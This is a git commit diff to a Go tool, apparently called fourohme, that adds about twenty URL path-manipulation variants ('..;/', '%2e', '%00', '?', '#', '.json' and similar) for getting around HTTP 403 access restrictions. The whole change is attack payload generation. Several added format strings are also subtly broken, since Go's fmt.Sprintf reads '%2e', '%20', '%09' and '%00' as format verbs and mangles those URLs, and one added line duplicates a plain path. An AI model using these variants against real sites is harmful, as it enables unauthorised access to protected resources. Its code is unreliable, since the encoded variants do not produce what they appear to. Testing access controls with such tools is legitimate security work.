Adds additional path manipulation options

topscoder · topscoder · commit b4f990f89d0d · 2024-02-05T13:28:48.000+01:00
Borrowed from https://github.com/yunemse48/403bypasser
diff --git a/fourohme.go b/fourohme.go
@@ -507,6 +507,25 @@ func main() {
 		urlList = append(urlList, fmt.Sprintf("%s/.;%s", sUrl, sPath))
 		urlList = append(urlList, fmt.Sprintf("%s//;/%s", sUrl, sPath))
 		urlList = append(urlList, fmt.Sprintf("%s%s", sUrl, strings.ToUpper(sPath)))
+		urlList = append(urlList, fmt.Sprintf("%s/%2e/%s", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s..;/", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s/..;/", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s%20", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s%09", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s%00", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s.json", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s.css", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s.html", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s?", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s??", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s???", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s?testparam=fourohme", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s#", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s#test", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/%s/.", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s//%s//", sUrl, sPath))
+		urlList = append(urlList, fmt.Sprintf("%s/./%s/./", sUrl, sPath))
 
 		for _, url := range urlList {
 			wg.Add(1)
